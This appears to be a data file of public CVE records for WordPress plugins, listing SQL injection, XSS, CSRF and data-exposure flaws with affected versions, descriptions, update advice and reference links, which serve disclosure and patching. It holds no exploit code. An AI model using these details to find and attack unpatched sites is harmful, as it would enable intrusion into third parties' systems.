{"CVE_ID":"CVE-2024-11939","slug":"cost-calculator-builder-pro","versionImpact":"3.2.15","versionEndExcluding":"3.2.16","description":"The Cost Calculator Builder PRO plugin for WordPress is vulnerable to blind time-based SQL Injection via the \u2018data\u2019 parameter in all versions up to, and including, 3.2.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version#id-3.2.16\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version#id-3.2.16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96ad872f-9831-4113-99ae-322bcd2b6fbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96ad872f-9831-4113-99ae-322bcd2b6fbd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3499","slug":"robo-gallery","versionEndExcluding":"3.2.16","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea29413b-494e-410e-ae42-42f96284899c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea29413b-494e-410e-ae42-42f96284899c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9504","slug":"booking-calendar","versionImpact":"3.2.15","versionEndExcluding":"3.2.16","description":"The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 3.2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/hacked.be\\\/posts\\\/CVE-2024-9504\",\"name\":\"https:\\\/\\\/hacked.be\\\/posts\\\/CVE-2024-9504\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195800\\\/booking-calendar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195800\\\/booking-calendar\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11090","slug":"restrict-content","versionImpact":"3.2.13","versionEndExcluding":"3.2.14","description":"The Membership Plugin \u2013 Restrict Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.13 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 3.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227065\\\/restrict-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227065\\\/restrict-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7615c391-ccb1-4990-bbfd-949782cc609a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7615c391-ccb1-4990-bbfd-949782cc609a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4684","slug":"blockspare","versionImpact":"3.2.13.1","versionEndExcluding":"3.2.13.2","description":"The BlockSpare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites \u2013 Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML attributes of Image Carousel and Image Slider widgets in all versions up to, and including, 3.2.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockspare\\\/trunk\\\/dist\\\/blocks.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockspare\\\/trunk\\\/dist\\\/blocks.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f4f8b84-3f65-430b-b749-6afae8d53153?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f4f8b84-3f65-430b-b749-6afae8d53153?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6687","slug":"ctt-expresso-para-woocommerce","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The CTT Expresso para WooCommerce plugin for WordPress is vulnerable to sensitive information exposure in all versions up to and including 3.2.12 via the \/wp-content\/uploads\/cepw directory. The generated .pdf and log files are publicly accessible and contain sensitive information such as sender and receiver names, phone numbers, physical addresses, and email addresses","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13088645-8233-40fb-8755-cbdf44c0eaf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13088645-8233-40fb-8755-cbdf44c0eaf7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3127496%40ctt-expresso-para-woocommerce&new=3127496%40ctt-expresso-para-woocommerce&sfp_email=&sfph_mail=#file25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3127496%40ctt-expresso-para-woocommerce&new=3127496%40ctt-expresso-para-woocommerce&sfp_email=&sfph_mail=#file25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0718","slug":"wp-nested-pages","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Nested Pages WordPress plugin before 3.2.13 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ddd8eb-33f1-49cf-9428-3d89262b1887\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69ddd8eb-33f1-49cf-9428-3d89262b1887\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6478","slug":"ctt-expresso-para-woocommerce","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The CTT Expresso para WooCommerce WordPress plugin before 3.2.13 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39a78741-eeae-4a27-8136-7d0bb0bf2263\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39a78741-eeae-4a27-8136-7d0bb0bf2263\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6012","slug":"cost-calculator-builder","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'embed-create-page' and 'embed-insert-pages' functions in all versions up to, and including, 3.2.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary posts and append arbitrary content to existing posts.","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7da039-f6b8-46b7-a43a-145e9f8844c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7da039-f6b8-46b7-a43a-145e9f8844c3?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/admin.js\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6011","slug":"cost-calculator-builder","versionImpact":"3.2.12","versionEndExcluding":"3.2.13","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018textarea.description\u2019 parameter in all versions up to, and including, 3.2.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ad3677-1b02-4f22-af50-e88b2ec83f54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03ad3677-1b02-4f22-af50-e88b2ec83f54?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1SFQXlRUQw7THm_Vay_pFH3pIX1cjH4AY\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1SFQXlRUQw7THm_Vay_pFH3pIX1cjH4AY\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[\"Exploit\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L15\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/templates\\\/frontend\\\/fields\\\/cost-text.php#L26\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108606\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2025-7367","slug":"strong-testimonials","versionImpact":"3.2.11","versionEndExcluding":"3.2.12","description":"The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Testimonial Custom Fields in all versions up to, and including, 3.2.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/strong-testimonials\\\/tags\\\/3.2.11\\\/includes\\\/functions-template.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65395034-0b20-462c-93ee-e755e5c888a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65395034-0b20-462c-93ee-e755e5c888a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11008","slug":"members","versionImpact":"3.2.10","versionEndExcluding":"3.2.11","description":"The Members \u2013 Membership & User Role Editor Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 3.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199682\\\/members\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199682\\\/members\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6ad375-da04-4b56-8077-e26c148e7527?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6ad375-da04-4b56-8077-e26c148e7527?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4567","slug":"post-slider-and-carousel","versionImpact":"3.2.9","versionEndExcluding":"3.2.10","description":"The Post Slider and Post Carousel with Post Vertical Scrolling Widget  WordPress plugin before 3.2.10 does not validate and escape some of its Widget options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8a50ae9-40c4-42f8-9342-2440d3bc12bb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3956","slug":"pods","versionImpact":"3.2.1","versionEndExcluding":"3.2.1.1","description":"The Pods \u2013 Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pod Form widget in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pods\\\/tags\\\/3.2.1\\\/ui\\\/front\\\/form.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pods\\\/tags\\\/3.2.1\\\/ui\\\/front\\\/form.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/includes\\\/data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/includes\\\/data.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/ui\\\/front\\\/form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083418\\\/pods\\\/tags\\\/3.1.4.1\\\/ui\\\/front\\\/form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pods.io\\\/2024\\\/05\\\/08\\\/pods-3-2-1-1-security-release\\\/\",\"name\":\"https:\\\/\\\/pods.io\\\/2024\\\/05\\\/08\\\/pods-3-2-1-1-security-release\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4958","slug":"user-registration","versionImpact":"3.2.0.1","versionEndExcluding":"3.2.1","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_form_action' function in versions up to, and including, 3.2.0.1. This makes it possible for authenticated attackers, with contributor-level permissions and above, to import a registration form with a default user role of administrator. If an administrator approves or publishes a post or page with the shortcode to the imported form, any user can register as an administrator.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710574a8-a6e2-4ee6-9ea7-03a34994fec7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710574a8-a6e2-4ee6-9ea7-03a34994fec7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095484\\\/user-registration\\\/tags\\\/3.2.1\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095484\\\/user-registration\\\/tags\\\/3.2.1\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2871","slug":"quadmenu","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The WordPress Mega Menu \u2013 QuadMenu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the ajax_dismiss_notice() function. This makes it possible for unauthenticated attackers to update any user meta to a value of one, including wp_capabilities which could result in a privilege deescalation of an administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quadmenu\\\/tags\\\/3.2.0\\\/lib\\\/class-admin.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quadmenu\\\/tags\\\/3.2.0\\\/lib\\\/class-admin.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270825\\\/quadmenu\\\/tags\\\/3.2.1\\\/lib\\\/class-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270825\\\/quadmenu\\\/tags\\\/3.2.1\\\/lib\\\/class-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ba7b675-54d6-4f0e-b60f-1c7fa6ff24ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ba7b675-54d6-4f0e-b60f-1c7fa6ff24ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5937","slug":"paid-membership","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The MicroPayments \u2013 Fans Paysite: Paid Creator Subscriptions, Digital Assets, Wallet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the adminOptions() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-membership\\\/trunk\\\/inc\\\/options.php#L1364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-membership\\\/trunk\\\/inc\\\/options.php#L1364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318389\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318389\\\/#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d80417bc-2bb2-4826-be03-796a7cd2825f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d80417bc-2bb2-4826-be03-796a7cd2825f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7046","slug":"portfolio-elementor","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The Portfolio for Elementor & Image Gallery | PowerFolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom JS Attributes of Plugin's widgets in all versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\r\nThe issue was partially fixed in version 3.2.0 and fully fixed in version 3.2.1","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/image_gallery_widget.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/image_gallery_widget.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/portfolio_widget.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/portfolio_widget.php#L541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318503\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f01584-e389-4551-b151-f3f0686d1d5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f01584-e389-4551-b151-f3f0686d1d5d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6455","slug":"elementskit-lite","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.2.0 due to a missing capability checks on ekit_widgetarea_content function. This makes it possible for unauthenticated attackers to view any item created in Elementor, such as posts, pages and templates including drafts, pending and private items.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c336530-09b2-4ead-923f-f1a6266e3e8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c336530-09b2-4ead-923f-f1a6266e3e8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.0\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.0\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2628","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not have CSRF checks (either flawed or missing completely) in various AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: Delete arbitrary appointments\/medical records\/etc, create\/update various users (patients, doctors etc)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0741e2c-c529-4815-8744-16e01cdb0aed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0741e2c-c529-4815-8744-16e01cdb0aed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2627","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin\/Doctors\/etc and update plugin's settings","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/162d0029-2adc-4925-9985-1d5d672dbe75\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/162d0029-2adc-4925-9985-1d5d672dbe75\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2624","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrator","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc3a841d-a95b-462e-be4b-acaa44e77264\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc3a841d-a95b-462e-be4b-acaa44e77264\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2623","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not restrict the information returned in a response and returns all user data, allowing low privilege users such as subscriber to retrieve sensitive information such as the user email and hashed password of other users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85cc39b1-416f-4d23-84c1-fdcbffb0dda0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85cc39b1-416f-4d23-84c1-fdcbffb0dda0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5971","slug":"save-as-pdf-by-pdfcrowd","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"The Save as PDF Plugin by Pdfcrowd WordPress plugin before 3.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03a201d2-535e-4574-afac-791dcf23e6e1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03a201d2-535e-4574-afac-791dcf23e6e1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
